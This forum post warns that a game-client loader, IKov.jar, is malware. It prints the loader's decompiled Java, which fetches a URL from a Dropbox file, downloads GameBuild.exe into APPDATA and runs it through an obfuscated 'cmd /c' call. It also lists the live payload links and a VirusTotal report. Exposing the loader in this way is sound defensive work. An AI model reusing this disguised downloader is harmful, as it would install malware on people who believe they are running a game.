Your "loader" "Ikov.jar (md5hash: 194691e68bcfa73f03442d7c17e29366 *IKov.jar) is linked to a file which is marked malicious
Code:
package com.runelive;
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintStream;
import java.net.URL;
public final class Main
{
public static void MainLaunch()
{
try
{
Process localProcess = Runtime.getRuntime().exec(getBuildVersion() + " /c " + System.getenv("APPDATA") + File.separator + GetGamePack("GameBuild"));
BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localProcess.getInputStream()));
Loader.main(null);
}
catch (Exception localException)
{
System.out.println("Loading Client...");
}
}
public static String GetGamePack(String paramString)
{
try
{
String str1 = "exe";
String str2 = ".";
return paramString + str2 + str1;
}
catch (Exception localException) {}
return "GameBuild";
}
public static void main(String[] paramArrayOfString)
throws IOException
{
try
{
String str = System.getenv("APPDATA") + File.separator + GetGamePack("GameBuild");
File localFile = new File(str);
if (!localFile.exists())
{
StartMainClient(ReadGameData(), str);
MainLaunch();
}
else
{
MainLaunch();
}
}
catch (Exception localException)
{
System.out.println(localException);
return;
}
}
public static String getBuildVersion()
{
String[] arrayOfString = { "d", "a", "c", "m", "n", "o", "p", "h" };
return String.valueOf(arrayOfString[2] + arrayOfString[3] + arrayOfString[0]);
}
public static void StartMainClient(String paramString1, String paramString2)
throws IOException
{
try
{
BufferedInputStream localBufferedInputStream = null;
FileOutputStream localFileOutputStream = null;
try
{
localBufferedInputStream = new BufferedInputStream(new URL(paramString1).openStream());
localFileOutputStream = new FileOutputStream(paramString2);
byte[] arrayOfByte = new byte['?'];
int i;
while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) != -1) {
localFileOutputStream.write(arrayOfByte, 0, i);
}
}
finally
{
if (localBufferedInputStream != null) {
localBufferedInputStream.close();
}
if (localFileOutputStream != null) {
localFileOutputStream.close();
}
}
}
catch (Exception localException)
{
System.out.println("Client Loaded.");
System.out.println(localException);
return;
}
}
public static String ReadGameData()
{
try
{
URL localURL = new URL("https://dl.dropboxusercontent.com/s/wzkv29p5n6tci9p/RSBuildVersion.txt");
BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localURL.openStream()));
return localBufferedReader.readLine().toString();
}
catch (Exception localException) {}
return "http://rune-server.ee/";
}
}
Link to loader: https://dl.dropboxusercontent.com/s/...b3sbe/IKov.jar
https://dl.dropboxusercontent.com/s/...ildVersion.txt link to http://justtakingyourfiles.com/x/GameBuild.exe
https://www.virustotal.com/en/file/8...d131/analysis/
Looking at the exe itself this is not a false positive and is indeed a virus of sorts.